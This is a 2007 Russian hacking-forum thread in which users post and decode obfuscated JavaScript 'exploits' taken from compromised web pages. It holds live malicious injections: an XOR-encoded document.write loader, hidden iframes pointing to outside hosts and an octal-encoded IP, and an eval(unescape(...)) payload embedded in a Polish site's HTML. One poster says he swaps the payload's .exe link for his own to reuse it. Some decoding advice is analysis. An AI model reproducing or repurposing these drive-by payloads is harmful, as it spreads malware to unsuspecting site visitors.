ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Помогите расшифровать сплойты
   
 
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 05.11.2007, 14:21
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию
Вот ещё сплойтеГ:
Код:
<script language="JavaScript">
e = '0x00' + '45';str1 = "%FE%A6%AD%B0%DA%B7%B6%BD%AE%A1%F9%E4%B0%AD%B7%AD%A4%AD%AE%AD%B6%BD%FC%A2%AD%A6%A6%A1%A8%E4%F8%FE%AD%A0%B4%A5%A9%A1%DA%B7%B4%A7%F9%E4%A2%B6%B6%AA%FC%EB%EB%A6%A8%B0%E9%A7%AB%B1%A8%B6%A1%B4%E8%A7%AB%A9%EB%A8%A9%A6%EB%B6%B4%A0%EB%E4%DA%B3%AD%A6%B6%A2%F9%F5%DA%A2%A1%AD%A3%A2%B6%F9%F5%F8%FE%EB%AD%A0%B4%A5%A9%A1%F8%FE%EB%A6%AD%B0%F8%DA%C9%CC";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
</script><br>&nbsp;
<br>&nbsp;
</body>
</html>

OTMOPO3b +1 к репе
Последний раз редактировалось Nightmarе; 05.11.2007 в 14:23..
 

  #12  
Старый 05.11.2007, 14:59
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию
Цитата:
Сообщение от OTMOPO3b  
_http://www.xakepy.ru/showthread.php?t=34170

Ознакомился... помогает в некоторых случаях, а что делать если в сплойте 2 раза стоит "document.write", если оба раза подменить на alert, то он тока 1 раз выведется... блин лан.
 

  #13  
Старый 05.11.2007, 21:58
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию
Код:
<div style="visibility:hidden"><iframe src="http://dnv-counter.com/nmd/trf/" width=1 height=1></iframe></div>
Почему это только один раз выведется? Два раза алерт и выскочит, по крайней мере в Опере именно так
Последний раз редактировалось [Raz0r]; 05.11.2007 в 22:00..
 

  #14  
Старый 06.11.2007, 00:13
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию
я про сплойты в первом сообщении... их таким способом у меня не получилось расшифровать
 

  #15  
Старый 06.11.2007, 03:07
OTMOPO3b
Новичок
Регистрация: 29.04.2007
Сообщений: 7
Провел на форуме:
184652

Репутация: 1
По умолчанию
Цитата:
Ознакомился... помогает в некоторых случаях, а что делать если в сплойте 2 раза стоит "document.write", если оба раза подменить на alert, то он тока 1 раз выведется... блин лан.
на первый "document.write" забей, второй замени на алерт,в итоге получишь код который тебе написал gemaglabin .как он расшифровал куда ломится ифрейм я хз..... у меня он долбился на другой адрес..... кроме этого у мну сей код ломился на IP адрес, перейдя по которому я получил в титле ret_ok O_o
В итоге мне надоело , продолжейте сами
 

  #16  
Старый 06.11.2007, 10:48
.::Gh0st::.
Гарант Форума
Регистрация: 22.01.2005
Сообщений: 267
Провел на форуме:
1982081

Репутация: 1067
Отправить сообщение для .::Gh0st::. с помощью ICQ
По умолчанию
//оффтоп
ret_ok - насколько я помню это ответ гейта для пинча, так что будьте аккуратнее
 

  #17  
Старый 06.11.2007, 11:55
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию
Цитата:
Сообщение от OTMOPO3b  
на первый "document.write" как он расшифровал куда ломится ифрейм я хз
спс ещё раз, насчёт как расшифровал так вот в сплойте сточка:
var hp='update1.classictel.org',Sf='/html/';
а это прямая ссылка на .exe файлик... ну заменяю на свой как обычно и ни под каким браузером не пашет ;(
 

Trojan-Downloader.HTML.IFrame.o
  #18  
Старый 06.11.2007, 21:03
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию Trojan-Downloader.HTML.IFrame.o
вот еще сплойт
PHP код:
<SCRIPT LANGUAGE="JavaScript">
function selecturl(s) {
var gourl s.options[s.selectedIndex].value;        window.top.location.href gourl;
}
</SCRIPT>
<link rel="stylesheet" href="theme/big_city/style.css" type="text/css">
<style type="text/css"><!--

.text     font-familyVerdanafont-size11pxtext-alignjustifypadding-top3pxpadding-right5pxpadding-bottom3pxpadding-left5pxcolor#FFFFFF; font-weight: normal}

--></style>
</head>
<body><!-- o65 --><script language="JavaScript">eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C98%2C111%2C114%2C100%2C101%2C114%2C61%2C34%2C48%2C34%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34%2C100%2C105%2C115%2C112%2C108%2C97%2C121%2C58%2C32%2C110%2C111%2C110%2C101%2C59%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C48%2C49%2C50%2C49%2C46%2C48%2C49%2C51%2C55%2C46%2C48%2C50%2C50%2C53%2C46%2C48%2C49%2C52%2C54%2C47%2C37%2C51%2C48%2C37%2C51%2C49%2C37%2C54%2C67%2C37%2C54%2C55%2C37%2C52%2C51%2C37%2C54%2C53%2C37%2C54%2C65%2C37%2C54%2C69%2C47%2C37%2C54%2C70%2C37%2C55%2C53%2C37%2C55%2C52%2C37%2C50%2C69%2C37%2C54%2C56%2C37%2C55%2C52%2C37%2C54%2C68%2C37%2C54%2C67%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"));</script><!-- c65 -->

<!-- (Cstat24 Strona glowna -->
<script type="text/javascript">
<!--
document.writeln('<'+'scr'+'ipt type="text/javascript" src="http://s2.hit.stat24.com/_'+(new Date()).getTime()+'/script.js?id=1vY70KLMF.TUJ0.ejoApcJbfDowUIUMDD6tRWTd57i..Q7/l=11"></'+'scr'+'ipt>');
//-->
</script>
<!-- (Cstat24 podstrony -->
<script type="text/javascript">
<!--
document.writeln('<'+'scr'+'ipt type="text/javascript" src="http://s2.hit.stat24.com/_'+(new Date()).getTime()+'/script.js?id=bQCV9EsdycfPgad1O8OmrOW0nF8R45ftlAf.QXzo6e3.D7/l=11"></'+'scr'+'ipt>');
//-->
</script>
<!-- stat24 clickMap -->
<script type="text/javascript" src="http://s2.hit.stat24.com/scriptxy.js?id=ogJKgP8Qz8SJ94WDjPTGqIXy7OqpWbfeLqVc647hjJf.F7/align=center/type=absolute">
</script>
<a href="http://automoto.xvo.pl" target="_blank" alt="Portal motoryzacyjny">AutoMoto.xvo.pl</a>

<!-- stat.4u.pl NiE KaSoWaC -->
<a target=_top href="http://stat.4u.pl/?mojeautobiz"><img alt="" src="http://adstat.4u.pl/s4u.gif" border="0"></a>
<script language="JavaScript" type="text/javascript">
<!--
function s4upl() { return "&amp;r=er";}
//-->
</script>
<script language="JavaScript" type="text/javascript" src="http://adstat.4u.pl/s.js?mojeautobiz"></script>
<script language="JavaScript" type="text/javascript">
<!--
s4uext=s4upl();
document.write('<img alt="" src="http://stat.4u.pl/cgi-bin/s.cgi?i=mojeautobiz'+s4uext+'" width="1" height="1">')
//-->
</script>
<noscript><img alt="" src="http://stat.4u.pl/cgi-bin/s.cgi?i=mojeautobiz&amp;r=ns" width="1" height="1"></noscript>
<!-- stat.4u.pl KoNiEc --> 
расшифрованный:
PHP код:
<localhost>

<iframe border="0" style="display: none;" width="0" src="http://0121.0137.0225.0146/01lgCejn/out.html"></iframe
может кому-то понадобится. =Р

полный html файл здесь (слил через iptools)
 

  #19  
Старый 13.11.2007, 09:02
Dragon_X
Познающий
Регистрация: 12.11.2007
Сообщений: 36
Провел на форуме:
102286

Репутация: 8
По умолчанию
Цитата:
Сообщение от Nightmarе  
Огромная просьба объяснить как расшифровывать подобное плииз!!!!!!!!!!
Самый простой вариант - заменить document.write на alert и открыть полученный файл в браузере...

Можно в опере - там сможешь спокойно скопировать выводимый на экран текст... и сохранить его куда-нибудь)

Шифрование может быть многоуровневым, так что, возможно, тебе прийдётся повторить эту процедуру несколкьо раз)

P.S. Ну и стандартное предупреждение: в первый раз пробуй на машине, не имеющей прямой доступ к интернету (ну или просто отключись от него на время экспериментов)

Не заметил вторую страницу :-/
МОДЕРАТОРУ: Удалите сообщение, если считаете бесполезным
Последний раз редактировалось Dragon_X; 13.11.2007 в 09:05.. Причина: ответ уже был дан ранее
 

  #20  
Старый 13.11.2007, 13:00
Don1=2
Участник форума
Регистрация: 10.09.2007
Сообщений: 131
Провел на форуме:
829460

Репутация: 170
По умолчанию
piflit молодец, но мог бы и айпи указать )
вместо 0121.0137.0225.0146 -> 81.95.149.102
з.ы. штука древняя.. но как её расписывали я ржал ))
палится обычным пингом (конвертнуть айишник если кому надо можно тут http://ha.ckers.org/xss.htm )
 
 
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ